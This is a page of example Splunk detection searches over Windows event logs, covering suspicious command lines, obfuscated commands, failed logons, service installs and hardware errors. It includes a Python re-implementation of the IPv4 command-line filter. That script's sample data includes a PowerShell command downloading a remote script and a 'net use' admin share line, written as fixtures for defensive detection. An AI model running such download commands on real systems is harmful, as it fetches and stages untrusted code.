These are meant as examples only. Customization may be required for your specific environment. Results not guaranteed.
Many of these are built into the WLS app for Splunk along with EventID decoding and other useful features.
Bro
Bro PE / WLS MD5 NewHash match
`wlslogs` [search sourcetype=bro_files PE MD5 | dedup md5 | rename md5 as MD5 | fields MD5] NewHash=True| eval CallingProcess=coalesce(Process,CreatorProcessName) | eventstats dc(host) as hostCount by MD5 | dedup MD5 | table hostCount,Zone,Signed,CallingProcess,BaseFileName,CompanyName,InternalName,FileDescription,FileVersion,ProductVersion,MD5 | sort -hostCount
Command line parameters
Command line IPv4
`wlslogs` (EventID=592 OR EventID=4688) CommandLine="*" | rex field=CommandLine "\s(?<cmd_ip>\d+\.\d+\.\d+\.\d+)\s" | where NOT isnull(cmd_ip) AND NOT cmd_ip="127.0.0.1" | where cidrmatch("0.0.0.0/0",cmd_ip)
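The rex/where chain above only fires on an address bounded by whitespace on both sides and then drops loopback and anything cidrmatch rejects. The Python below (an added example, not part of the WLS app or the original page) re-implements that exact chain over constructed CommandLine values so the edge cases are visible: URLs and UNC paths are never extracted, an address at the very end of the line is missed, and a dotted version string is a false positive.

```python
import ipaddress
import re

# Same pattern as the Splunk rex: the address must have whitespace before and after it.
CMD_IP_RE = re.compile(r"\s(?P<cmd_ip>\d+\.\d+\.\d+\.\d+)\s")

# Constructed sample CommandLine values (not real 592/4688 events).
SAMPLE_COMMANDLINES = [
    'powershell.exe -c "Invoke-WebRequest http://198.51.100.23/a.ps1 -OutFile a.ps1"',  # "/" before IP: no match
    r"net use \\10.0.0.5\share /user:admin",  # backslash before IP: no match
    "ping 127.0.0.1 -n 1",                    # matched, then excluded as loopback
    "ping 192.0.2.10 -n 4",                   # matched and kept
    "ping 192.0.2.10",                        # no trailing whitespace: no match
    "setup.exe /version 1.2.3.4 /quiet",      # version string, valid IPv4 syntax: false positive
    "tool.exe --id 300.1.2.3 --go",           # matched by rex, rejected by cidrmatch
]


def extract_cmd_ip(commandline):
    # Equivalent of: rex field=CommandLine "\s(?<cmd_ip>...)\s" (first match only).
    m = CMD_IP_RE.search(commandline)
    return m.group("cmd_ip") if m else None


def is_valid_ipv4(value):
    # Equivalent of: where cidrmatch("0.0.0.0/0", cmd_ip), which is true only for
    # a syntactically valid IPv4 address (octets 0-255).
    try:
        return ipaddress.IPv4Address(value) in ipaddress.IPv4Network("0.0.0.0/0")
    except ValueError:
        return False


def filter_commandlines(commandlines):
    # Apply: rex | where NOT isnull(cmd_ip) AND NOT cmd_ip="127.0.0.1" | where cidrmatch(...)
    hits = []
    for cl in commandlines:
        ip = extract_cmd_ip(cl)
        if ip is None or ip == "127.0.0.1":
            continue
        if not is_valid_ipv4(ip):
            continue
        hits.append((ip, cl))
    return hits


if __name__ == "__main__":
    for ip, cl in filter_commandlines(SAMPLE_COMMANDLINES):
        print(ip, "<-", cl)
```

Loosening the pattern to `(?<![\w.])(?<cmd_ip>\d{1,3}(?:\.\d{1,3}){3})(?![\w.])` would also catch addresses inside URLs, UNC paths and at end of line; the version-string false positive has to be handled by excluding known installer command lines.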
Command line redirect
`wlslogs` (EventID=592 OR EventID=4688) CommandLine="*>*"
Netsh usage
`wlslogs` (EventID="592" OR EventID="4688") "netsh.exe" CommandLine="*netsh*"
Non-browser command line URL
`wlslogs` (EventID="592" OR EventID="4688") NOT BaseFileName="firefox.exe" NOT BaseFileName="iexplore.exe" NOT BaseFileName="chrome.exe" CommandLine="*://*"
Registry usage
`wlslogs` (EventID="592" OR EventID="4688") "reg.exe" CommandLine="*reg*"
Command Monitor
Obfuscated commands
`wlslogs` WLS_CommandMonitor Command="*^*"
Hardware
Disk errors
`wlslogs` ProviderName="Disk"
Display errors
`wlslogs` ProviderName="Display"
Hardware errors
`wlslogs` ProviderName="Microsoft-Windows-WHEA-Logger" | fillnull ErrorType value=0 | fillnull value="" | stats count by host,EventID,ErrorType
Low server disk space
| multisearch [ | search [ | search (WLS_WMI MonitorName="OperatingSystem") OR WMI_OperatingSystem ProductType>1 hoursago=24 | dedup host | fields host ] WLS_PerfCounter CategoryName="LogicalDisk" CounterName="% Free Space" | rename Value AS PercentFreeSpace ] [ | search [ | search (WLS_WMI MonitorName="OperatingSystem") OR WMI_OperatingSystem ProductType>1 hoursago=24 | dedup host | fields host ] WLS_PerfCounter CategoryName="LogicalDisk" CounterName="Free Megabytes" | rename Value AS FreeSpaceMB ]
| selfjoin host, GroupID, InstanceName
| search FreeSpaceMB=* PercentFreeSpace=* NOT (host="safe" InstanceName="E:")
| dedup host, InstanceName sortby -_time
| eval size=(FreeSpaceMB/(PercentFreeSpace/100))/1024
| eval used=size-(FreeSpaceMB/1024)
| eval avail=FreeSpaceMB/1024
| eval percent_used=100-PercentFreeSpace
| search avail<0.7 OR percent_used>95
| table host, InstanceName, size, used, avail, percent_used | rename host AS "Host", InstanceName AS "Volume", size AS "Size (GB)", used AS "Used (GB)", avail AS "Available (GB)", percent_used AS "Percent Used"
NTFS errors
`wlslogs` ProviderName="Ntfs"
Predicted drive failure
`wlslogs` WLS_WMI MonitorName="FailurePredictStatus" PredictFailure="True" | dedup host,InstanceName sortby -_time
Logon Activity
Multiple failed logons
`wlslogs` EventID="529" OR EventID="530" OR EventID="531" OR EventID="532" OR EventID="533" OR EventID="534" OR EventID="535" OR EventID="536" OR EventID="537" OR EventID="539" OR EventID="4625" | eval auth_package=coalesce(AuthenticationPackage, AuthenticationPackageName) | eval logon_process=coalesce(LogonProcess, LogonProcessName) | eval logon_type=LogonType | eval logon_type_description=LogonTypeDescription | eval src_nt_domain=coalesce(CallerDomain, SubjectDomainName) | eval subject_user_name=coalesce(CallerUserName, SubjectUserName) | eval dest_nt_domain=coalesce(Domain, TargetDomainName) | eval target_user_name=coalesce(UserName, TargetUserName) | eval src_host_short=WorkstationName | eval original_user=target_user_name | fillnull value=0 original_user, dest_nt_domain, auth_package, FailureReason | stats count dc(host) as hostCount BY original_user, dest_nt_domain, auth_package, FailureReason | search count>50
Misc
Alternate data stream execution
`wlslogs` (EventID=4688 OR EventID=592) AlternateDataStream=True
Failed/failing system clock
`wlslogs` "Possible bad clock"
Microsoft AV Detection
`wlslogs` ((ProviderName="Microsoft Antimalware" sourcetype="wls:System") OR sourcetype="wls:Microsoft-Windows-WindowsDefender/Operational") (EventID="1116" OR EventID="1117") | eval ThreatName=coalesce(ThreatName,Data7) | eval SeverityName=coalesce(SeverityName,Data9) | eval DetectionUser=coalesce(DetectionUser,Data19) | eval Path=coalesce(Path,Data21) | eval OriginName=coalesce(OriginName,Data23) | eval ExecutionName=coalesce(ExecutionName,Data25) | eval ActionName=coalesce(ActionName,Data30) | eval ErrorDescription=coalesce(ErrorDescription,Data33) | eval AdditionalActionsString=coalesce(AdditionalActionsString,Data37) | eval TypeName=coalesce(TypeName,Data27) | eval ProcessName=coalesce(ProcessName,Data18) | table _time,host,DetectionUser,ThreatName,SeverityName,TypeName,ProcessName,OriginName,ExecutionName,ActionName,ErrorDescription,AdditionalActionsString,Path
Processes
Launched by Internet Explorer
LogType=WindowsEventLog (EventID=592 OR EventID=4688) CreatorProcessName=iexplore NOT BaseFileName="iexplore.exe" | dedup BaseFileName,CommandLine
Non standard process extension
`wlslogs` EventID=4688 | regex BaseFileName!="(?i)\.(exe|scr)$"
Services
Abnormal service start
`wlslogs` EventID=4688 BaseFileName="svchost.exe" NOT CreatorProcessName="services" NOT CreatorProcessName="svchost"
New service install
`wlslogs` EventID="601" OR EventID="4697" OR EventID="7045"
Windows Errors
Application Error
`wlslogs` ProviderName="Application Error"
Application Hang
`wlslogs` ProviderName="Application Hang"
Application Popup
`wlslogs` ProviderName="Application Popup"
BSOD
`wlslogs` host=* EventID=1001 ProviderName="Microsoft-Windows-WER-SystemErrorReporting" Level="2"